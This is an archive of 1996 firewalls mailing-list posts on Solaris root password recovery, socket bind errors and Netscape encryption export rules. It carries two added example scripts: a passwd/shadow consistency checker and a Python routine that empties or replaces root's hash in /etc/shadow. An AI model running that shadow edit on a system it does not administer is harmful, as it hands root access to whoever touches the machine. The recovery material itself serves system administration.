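Jim Wojno's point above (that Solaris keeps the password hash in /etc/shadow, so an edit to /etc/passwd alone leaves the two files out of step) suggests a check worth running against the mounted root filesystem before rebooting. The script below is an added example written for this archive, not code from Jim Wojno or any other poster in the thread. It compares a passwd/shadow pair and reports entries that disagree, accounts whose hash was left in passwd instead of shadow, and accounts whose shadow password field is empty (a passwordless login, which is exactly the state the recovery steps in this thread leave root in until the password is reset). The sample files are constructed for illustration; on a real system you would point it at the mounted copies, e.g. /mnt/etc/passwd and /mnt/etc/shadow.

```shell
#!/bin/sh
# Added example: consistency check between a passwd file and its shadow file.
# Not from the thread; the sample files below are constructed for illustration.
# Usage on a root filesystem mounted at /mnt:
#   check_shadow_consistency /mnt/etc/passwd /mnt/etc/shadow

# Print one line per problem found (nothing if the two files agree).
# Arguments: $1 = passwd file, $2 = shadow file.
check_shadow_consistency() {
    awk -F: '
        # Pass 1 (the shadow file, given first): remember each user and hash.
        FILENAME == ARGV[1] {
            in_shadow[$1] = 1
            shadow_hash[$1] = $2
            next
        }
        # Pass 2 (the passwd file): skip comments and malformed lines.
        /^#/ || NF < 7 { next }
        {
            user = $1; pw = $2
            seen[user] = 1
            if (pw != "x")
                printf "%s: passwd field is \"%s\" instead of \"x\" (not shadowed)\n", user, pw
            else if (!(user in in_shadow))
                printf "%s: marked \"x\" in passwd but has no shadow entry\n", user
            else if (shadow_hash[user] == "")
                printf "%s: empty password in shadow (logs in without a password)\n", user
        }
        END {
            for (u in in_shadow)
                if (!(u in seen))
                    printf "%s: shadow entry with no passwd entry\n", u
        }
    ' "$2" "$1" | sort
}

# Number of problems found, printed on stdout (0 for a consistent pair).
findings_count() {
    check_shadow_consistency "$1" "$2" | awk 'END { print NR }'
}

# Constructed sample files in the Solaris 2.x layout; removed on exit.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
nobody:x:60001:60001:Nobody:/:
pera:x:1001:10:Example User:/export/home/pera:/bin/ksh
stale:x:1002:10:Listed only in passwd:/export/home/stale:/bin/sh
legacy:AB1cd2EF3gh4i:1003:10:Hash left in passwd:/export/home/legacy:/bin/sh
EOF

cat > "$SAMPLE_DIR/shadow" <<'EOF'
root::6445::::::
daemon:NP:6445::::::
bin:NP:6445::::::
nobody:NP:6445::::::
pera:Xy9abcdefghij:9691::::::
EOF

# Stand-alone run: list the findings, then the count (3 for the sample above).
check_shadow_consistency "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/shadow"
echo "problems found: $(findings_count "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/shadow")"
```

On the constructed sample the check flags root (empty shadow field), stale (no shadow entry) and legacy (hash still sitting in the world-readable passwd file); system accounts with NP and a user with a normal hash pass. A clean run prints nothing, which is the state to confirm before taking the machine back onto the network.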
Jim Wojno Systems Administrator Telxon Corporation jwojn@telxon.com From firewalls-owner Thu Jul 18 08:19:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02456 for firewalls-outgoing; Thu, 18 Jul 1996 08:15:42 -0700 (PDT) Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA02435 for ; Thu, 18 Jul 1996 08:15:29 -0700 (PDT) Received: by london.micrognosis.com (4.1/NAR-Gateway) Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) Received: from moria by zeus.london.micrognosis.com (4.1/SMI-4.1) From: nreadwin@london.micrognosis.com (Neil Readwin) Received: by moria Message-Id: <9607181511.AA03314@moria> Subject: Re: CERT Advisories (was: Re: Dirty dogs) To: Bill@Husler.xo.com (Bill Husler) Date: Thu, 18 Jul 1996 16:11:37 +0100 (BST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607181353.GAA22187@miles.greatcircle.com> from "Bill Husler" at Jul 18, 96 06:49:41 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I am interested in finding out more about these mailing lists. http://iss.net/sec_info/maillist.html has charters and subscription details for most of them. -- "So you could say the greatest achievement of the Internet is that it turns nuclear war into nothing more than a series of routing errors." 
-- Mark Pesce

From firewalls-owner Thu Jul 18 09:23:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06918 for firewalls-outgoing; Thu, 18 Jul 1996 09:06:31 -0700 (PDT) Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA06910 for ; Thu, 18 Jul 1996 09:06:21 -0700 (PDT) Received: from histar2.bgsm.edu by scruz.net (8.7.3/1.34) Message-ID: <31EE8A29.750F083D@ezunx.com> Date: Thu, 18 Jul 1996 12:02:01 -0700 From: raf X-Mailer: Mozilla 2.01 (X11; I; Linux 1.2.13 i486) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: bind address already in use Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I know I have seen this before, in regards to INETD and use of TCP wrappers: what would cause the errors in bind??? We are getting strange errors since putting in tcpd and connections are not quite working. The weird thing is, we pulled tcpd out and are still getting the same error. This is on solaris 2.4.

thanks, rich

From firewalls-owner Thu Jul 18 09:38:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06899 for firewalls-outgoing; Thu, 18 Jul 1996 09:06:12 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA06892 for ; Thu, 18 Jul 1996 09:06:03 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607181601.AA19993@dsacg1.dsac.dla.mil> Subject: Re: your problems.....
To: cyber@ipsiss.demon.co.uk Date: Thu, 18 Jul 96 12:01:11 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199607181208.MAA00318@ipsiss.demon.co.uk>; from "CyberJunkie" at Jul 18, 96 12:08 (noon) Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I hope I am not offending the group, but this was interesting.

>
> Hello steven,
> I hope this mail doesn't come across as arrogant, as that isn't intended.
> You say that you have lost root to some unknown individual(s). Considering
> your os, I'm not very surprised. Crashing your machine however is another
> matter. I am a hacker, in that i enjoy exploring computer systems and
> operating systems. I do not condone however the actions of individuals,
> calling themselves hackers that disrupt and damage systems. In fact I personally
> abhor these individuals. If you are still experiencing problems, and would
> like someone to take a look at the general security of your system, i would be
> glad to. I can also find out who is attacking your system, and try to have
> words with them. I will not however supply names to the authorities.
> Good luck,
> Hope to hear from you,
>
> Cyberjunkie
>
> p.s. I seriously recommend upgrading your operating system
>

dear cyberjunkie,

first off, your mail doesn't come across as arrogant, only misinformed. It is NOT ME who has a problem, I was answering a msg posted by someone else. If you in fact consider yourself a "hacker" you should have read the ENTIRE SMTP headers and you would see the thread I was answering was not mine. Additionally, whether you condone hacking or not, it happens. Be it a "bona-fide" user of systems who is just curious (a lot of bugs have been discovered by people who don't always have malicious intents, as well as they may not know what ramifications they have just discovered), as well as a malicious hacker worming his way in through exploitation of some known but unplugged hole.
Bottom line is hacking happens and policing it is very difficult, proving it is more so. I know if/when I catch someone they get one warning, if it continues (questionable acts) out their account goes PERIOD. This is for bona-fide users.

As far as ME letting YOU look at the security of MY system(s), (do I have a tag on that says MORON?) I don't think so, thank you very much.

Reporting to authorities: This is where you and I differ, I WOULD supply names to the OSI, or any other office that requests it, as well as my local SECURITY office. I would also supply any pertinent info, I already have done this NUMEROUS times to the ASSIST, OSI, etc.. I would not deal with the individual unless I could deduce that it was an inadvertent accident, or just a novice user doing something stupid. (This does happen and it can be an honest mistake).

As for upgrading my OS, I don't think so, I am very comfortable with the bugs I currently have, rather than learn a whole bunch of new ones again, I don't think so.

I don't really ENJOY exploring computer systems, or OS's, I use them as I would a screwdriver; a TOOL, nothing more, nothing less. I have to support many OS's (unices, NT, windoze, etc), I need to understand how they interoperate and what marriage works best for our environment because no ONE OS is going to cover everything. I ENJOY riding my motorcycle in the dirt but that's a different story.....
take care spayne From firewalls-owner Thu Jul 18 09:41:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA07472 for firewalls-outgoing; Thu, 18 Jul 1996 09:23:24 -0700 (PDT) Received: from gw.lsli.com (gw.lsli.com [206.50.87.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA07461 for ; Thu, 18 Jul 1996 09:23:12 -0700 (PDT) Received: by gw.lsli.com (AIX 3.2/UCB 5.64/4.03) Received: by lsli.com via smwrap Version 2.2 Message-Id: <31EE63BD.66A9@lsli.com> Date: Thu, 18 Jul 1996 11:18:05 -0500 From: Livermore Software Reply-To: portusinfo@lsli.com Organization: Livermore Software Laboratories, Intl. Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: ANNOUNCE: PORTUS Version 2.2 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Livermore Software is pleased to announce the 2.2 release of its PORTUS Application Firewall. For more information please contact LSLI. -- Livermore Software Laboratories, Intl. 
2825 Wilcrest, Suite 160 Houston, Texas 77042-3358 vox: 713 974 3274 fax: 713 978 6246 portusinfo@lsli.com http://www.lsli.com From firewalls-owner Thu Jul 18 10:07:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA08402 for firewalls-outgoing; Thu, 18 Jul 1996 09:41:33 -0700 (PDT) Received: from ipi.smoothmove.com ([204.119.61.99]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA08348 for ; Thu, 18 Jul 1996 09:41:06 -0700 (PDT) Received: from uncle (uncle.smoothmove.com [204.119.61.101]) by ipi.smoothmove.com (8.7.1/8.7.1) with SMTP id KAA11448; Thu, 18 Jul 1996 10:07:17 -0700 Received: by uncle with Microsoft Mail Message-ID: <01BB748C.8162CD40@uncle> From: Jonathan Eggert To: Ron DuFresne Cc: "bill.stout@hidata.com" Subject: RE: RC4-128bit encryption for Netscape available Date: Thu, 18 Jul 1996 09:35:48 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here is a little info about the Netscape's use of the 128 bit encryption. This is cut and pasted from Edupage. Jon. U.S. GOV'T APPROVES ONLINE ENCRYPTION TOOL DISTRIBUTION The U.S. government has okayed Netscape Communications' plan to distribute its powerful 128-bit encryption software via the Internet, as long as it's sent only to U.S. citizens. Currently, the company has to ship the software via snail mail. Under the government's terms, Netscape must use a database to verify the names and addresses of people who want to download the software and ask them to sign affidavits stating they are U.S. citizens. Netscape says its 128-bit encryption software requires 309 septillion more times computing power to break the encryption code than its 40-bit version. (Wall Street Journal 16 Jul 96 B2) Edupage is written by John Gehl & Suzanne Douglas . Voice: 404-371-1853, Fax: 404-371-8057. 
Technical support is provided by Information Technology Services at the University of North Carolina at Chapel Hill.

---------- From: Matthew Keenan[SMTP:matt@firstpac.com.au] Sent: Thursday, July 18, 1996 5:53 AM To: Ron DuFresne Cc: bill.stout@hidata.com; Firewalls@GreatCircle.COM Subject: Re: RC4-128bit encryption for Netscape available

Ron DuFresne wrote this...
> On Wed, 17 Jul 1996, Bill Stout wrote:
>> You all probably know this by now, but yesterday Netscape announced
>> availability of downloadable RC4-128bit encryption Server and Browser
>> products to U.S. customers.
>> http://www.netscape.com/
> Yes, but as of about 20 mins ago, the download process for these products
> was not functioning...

i wonder how secure it is? i know it checks street addresses and the like, but couldn't this be faked? also how does the (i assume) ftp server know that you are valid? or does it download via http?
Matt -- Matthew Keenan Network Administrator First Pacific Stockbrokers Sydney, Australia From firewalls-owner Thu Jul 18 10:21:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA09383 for firewalls-outgoing; Thu, 18 Jul 1996 09:56:44 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA09374 for ; Thu, 18 Jul 1996 09:56:36 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id SAA23239; Thu, 18 Jul 1996 18:51:06 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from LCHE.apogee-com.fr (ingpc003.apogee-com.fr) by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31EE6B2C.12F@apogee-com.fr> Date: Thu, 18 Jul 1996 18:49:48 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: PCA Cc: firewalls@greatcircle.com Subject: Re: CCMAIL MOBILE References: <2.2.32.19960718014011.006bed84@204.243.240.5> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is a great problem. I solved one case with a tcp_wrapper invoking a ftp proxy or a tcprelay depending on the IP address, but the case was easy to solve since the CCRouters were clearly identified (inside and outside). 
Regards, Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Orsay Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Thu Jul 18 10:38:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA10781 for firewalls-outgoing; Thu, 18 Jul 1996 10:15:09 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA10773 for ; Thu, 18 Jul 1996 10:15:01 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id TAA23380; Thu, 18 Jul 1996 19:09:35 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from LCHE.apogee-com.fr (ingpc003.apogee-com.fr) by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31EE6F79.A4D@apogee-com.fr> Date: Thu, 18 Jul 1996 19:08:09 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: raf Cc: firewalls@greatcircle.com Subject: Re: bind address already in use References: <31EE8A29.750F083D@ezunx.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk When you forcibly kill a process, it happens that the process doesn't close a file descriptor correctly. When this fd is associated with a socket, the port won't be released for an hour or so... I don't remember the variable associated with the timer involved... "Bind: address already in use" means your process wants to open a socket as a server on a port already opened by another process (or not correctly released, as mentioned above).
Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Orsay Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Thu Jul 18 11:18:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA15127 for firewalls-outgoing; Thu, 18 Jul 1996 10:53:37 -0700 (PDT) Received: from team-alpha.icn-inc.net (team-alpha.icn-inc.net [206.105.108.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA15007 for ; Thu, 18 Jul 1996 10:52:53 -0700 (PDT) Received: from team-alpha.icn-inc.net (port11.icn-inc.net [206.105.108.11]) by team-alpha.icn-inc.net (8.6.11/8.6.9) with SMTP id OAA25003 for ; Thu, 18 Jul 1996 14:17:56 -0400 Message-ID: <31EE7AC1.62E0@icn-inc.net> Date: Thu, 18 Jul 1996 13:56:17 -0400 From: Andrew Worrall Organization: US Customs X-Mailer: Mozilla 2.01 (Win95; U) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Network Security Magazines? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any magazines/publications that are specific to network security? I've searched in several stores with no luck. If there are such magazines, a name of the magazine or Web address would be very helpful. 
Thanks A Worrall From firewalls-owner Thu Jul 18 11:25:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13834 for firewalls-outgoing; Thu, 18 Jul 1996 10:44:30 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA13795 for ; Thu, 18 Jul 1996 10:44:14 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA05824; Thu, 18 Jul 1996 12:41:09 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA13746; Thu, 18 Jul 1996 10:33:36 -0500 Received: by sonic.nmti.com; id AA18361; Thu, 18 Jul 1996 10:33:35 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181533.AA18361@sonic.nmti.com.nmti.com> Subject: Re: [HELP] I lost root password! To: pera@medcom.se Date: Thu, 18 Jul 1996 10:33:35 -0500 (CDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <31EE2C08.2CCA@medcom.se> from "P=?iso-8859-1?Q?=E4r Ahr=E9?=n" at Jul 18, 96 01:20:24 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > e) edit to /etc/passwd file and remove the root password SYNC or UMOUNT THE DISK !!!!!!!!!!!!!!!!!!!! 
> f) turn off the power or halt From firewalls-owner Thu Jul 18 11:34:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13815 for firewalls-outgoing; Thu, 18 Jul 1996 10:44:22 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA13776 for ; Thu, 18 Jul 1996 10:44:09 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA05813; Thu, 18 Jul 1996 12:41:06 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA13411; Thu, 18 Jul 1996 10:27:28 -0500 Received: by sonic.nmti.com; id AA18101; Thu, 18 Jul 1996 10:27:27 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181527.AA18101@sonic.nmti.com.nmti.com> Subject: Re: More hacker info from Forbes To: michael@memra.com (Michael Dillon) Date: Thu, 18 Jul 1996 10:27:26 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Michael Dillon" at Jul 17, 96 09:14:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > http://www.forbes.com/asap/6396/hack.htm Take it with a grain of salt, tho'. I can just picture these uberhacker guys laying it on thick with these stiff suits from Forbes... 
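The recovery procedure being discussed (boot single-user from the installation CD, mount the disk's root filesystem, edit the password file, flush the buffer cache, halt) comes down to one field in one line of /etc/shadow plus making sure that the write actually reaches the disk before the power goes off, which is what the SYNC warning above is about. The following is an added illustration, not code posted by anyone on the list. It performs that edit on shadow-format text, either clearing root's hash or copying another account's hash into root's field (the variant of logging in as root with your own password and then running passwd), refuses to proceed if any line does not have its nine fields, and writes the result with fsync on both the file and its directory. The mount point /a and the sample shadow lines are assumptions and constructed data; at a real single-user prompt the same edit is a short vi session followed by sync.

```python
"""
Added example for the 'lost root password' thread: the /etc/shadow edit the
recovery procedure performs, done as a function so the result can be checked
before anything is written, plus the write-and-sync step. Illustrative code,
not anything posted to the list. /a as the mount point of the disk's root
filesystem after a single-user CD boot is an assumption.
"""
import os
import tempfile

SHADOW_FIELDS = 9   # name:hash:lastchg:min:max:warn:inactive:expire:flag


def parse_shadow(text):
    """Split shadow text into lists of fields, rejecting malformed lines."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != SHADOW_FIELDS:
            raise ValueError("line %d: expected %d fields, got %d"
                             % (n, SHADOW_FIELDS, len(fields)))
        entries.append(fields)
    return entries


def reset_root_hash(text, copy_from=None):
    """
    Return new shadow text in which root's password field is either emptied
    (copy_from=None: root logs in with no password until it is reset) or
    replaced with the hash of the account named by copy_from (log in as root
    with your own password, then run passwd). Every other field and every
    other line is left exactly as it was.
    """
    entries = parse_shadow(text)
    by_name = {e[0]: e for e in entries}
    if "root" not in by_name:
        raise ValueError("no root entry")
    if copy_from is None:
        new_hash = ""
    else:
        if copy_from not in by_name:
            raise ValueError("no entry for %s" % copy_from)
        new_hash = by_name[copy_from][1]
        # Locked / no-password markers would lock root out instead of letting you in.
        if new_hash in ("", "*", "NP", "*LK*") or new_hash.startswith("!"):
            raise ValueError("%s has no usable password hash" % copy_from)
    by_name["root"][1] = new_hash
    return "\n".join(":".join(e) for e in entries) + "\n"


def write_synced(path, text, mode=0o400):
    """
    Write text to path via a temp file in the same directory, fsync the file,
    rename it into place and fsync the directory. Halting before the buffer
    cache is flushed is exactly how an edit like this gets lost; this is the
    programmatic equivalent of 'sync' before 'halt'.
    """
    d = os.path.dirname(path) or "."
    fd, tmp = tempfile.mkstemp(dir=d, prefix=".shadow.")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(text)
            f.flush()
            os.fsync(f.fileno())
        os.chmod(tmp, mode)
        os.rename(tmp, path)
        dfd = os.open(d, os.O_RDONLY)
        try:
            os.fsync(dfd)
        finally:
            os.close(dfd)
    except BaseException:
        if os.path.exists(tmp):
            os.unlink(tmp)
        raise


# Constructed sample; the hash strings are placeholders, not real hashes.
SAMPLE_SHADOW = (
    "root:AbCdEfGhIjKlM:9876::::::\n"
    "daemon:NP:6445::::::\n"
    "mike:XyZaBcDeFgHiJ:9870::::::\n"
)

if __name__ == "__main__":
    # Real use (assumed paths): after 'boot cdrom -s' and mounting the disk on /a,
    #   new = reset_root_hash(open("/a/etc/shadow").read(), copy_from="mike")
    #   write_synced("/a/etc/shadow", new)
    print(reset_root_hash(SAMPLE_SHADOW, copy_from="mike"), end="")
```

Whichever variant you use, change root's password the normal way as soon as the system is back up: with the copy variant root's password is now your own, and with the empty-field variant anyone at the console is root.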
From firewalls-owner Thu Jul 18 11:57:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13870 for firewalls-outgoing; Thu, 18 Jul 1996 10:44:51 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA13833; Thu, 18 Jul 1996 10:44:28 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA05831; Thu, 18 Jul 1996 12:41:13 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA13758; Thu, 18 Jul 1996 10:35:05 -0500 Received: by sonic.nmti.com; id AA18416; Thu, 18 Jul 1996 10:35:04 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181535.AA18416@sonic.nmti.com.nmti.com> Subject: Re: RC4-128bit encryption for Netscape available To: gary@habanero.jmu.edu (gary flynn) Date: Thu, 18 Jul 1996 10:35:04 -0500 (CDT) Cc: dufresne@winternet.com, firewalls-owner@GreatCircle.COM In-Reply-To: <199607181229.FAA17254@miles.greatcircle.com> from "gary flynn" at Jul 18, 96 08:25:21 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Either the government is even more technologically inept than I thought, > or Netscape really pulled one over on them. There's no way this provides > any control over the code. Whats to stop someone in-country from putting > up a gateway You mean, like any open CERN server with proxies turned on? 
From firewalls-owner Thu Jul 18 15:03:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA04023 for firewalls-outgoing; Thu, 18 Jul 1996 14:58:06 -0700 (PDT) Received: from net2.netacc.net (net2.netacc.net [206.28.142.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA04006; Thu, 18 Jul 1996 14:57:59 -0700 (PDT) Received: from localhost (bastian@localhost) by net2.netacc.net (8.7.5/8.7.3) with SMTP id RAA04657; Thu, 18 Jul 1996 17:53:04 -0400 (EDT) Date: Thu, 18 Jul 1996 17:53:04 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com cc: firewalls-owner@greatcircle.com, firewalls-admin@greatcircle.com Subject: Hey! Admin! List owner! Yeah, YOU! (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IS IT THAT HARD?! -- The One and Only |> bastian@mail.netacc.net |>astian http://net2.netacc.net/~bastian/ Vampyres' World... A Shared Reality. ---------- Forwarded message ---------- Date: Wed, 17 Jul 1996 18:43:14 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com Subject: Hey! Admin! List owner! Yeah, YOU! Sent mail to majordomo@greatcircle.com. It ignored my unsubscribe request. Sent mail to firewalls-owner@greatcircle.com. Was told to go back to majordomo@greatcircle.com. Jerked the majordomo account off again, GOT the fucking mail that PROVED it was broken, FORWARDED it to firewalls-owner@greatcircle.com, was ignored, AM STILL SUBSCRIBED. HOW HARD IS IT?! HELLO?! -- The One and Only |> bastian@mail.netacc.net |>astian http://net2.netacc.net/~bastian/ Vampyres' World... A Shared Reality.
From firewalls-owner Thu Jul 18 15:36:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05535 for firewalls-outgoing; Thu, 18 Jul 1996 15:24:05 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA05519 for ; Thu, 18 Jul 1996 15:23:55 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id RAA02279; Thu, 18 Jul 1996 17:20:52 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id OAA22639; Thu, 18 Jul 1996 14:13:52 -0500 Received: by sonic.nmti.com; id AA13799; Thu, 18 Jul 1996 14:13:51 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181913.AA13799@sonic.nmti.com.nmti.com> Subject: Re: bind address already in use To: zwobada@apogee-com.fr (Jean-Francois Zwobada) Date: Thu, 18 Jul 1996 14:13:51 -0500 (CDT) Cc: raf@ezunx.com, firewalls@GreatCircle.COM In-Reply-To: <31EE6F79.A4D@apogee-com.fr> from "Jean-Francois Zwobada" at Jul 18, 96 07:08:09 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > When you strongly kill a process, it happens the process don't close a > file descriptor correctly. Um, I hope not. Every file descriptor associated with a process is closed on exit, and signal delivery goes through exit1() when it kills a process... hmmm...

kern_exit.c:

	/*
	 * Close open files and release open-file table.
	 * This may block!
	 */
	fdfree(p);

This grovels through all the files opened by the process and calls closef() on each one. And in kern_descrip.c the close() system call just checks to see if it should call munmapfd(), unthreads the fd off the proc structure, and calls closef(). exit1() takes care of unmapping the memory elsewhere.
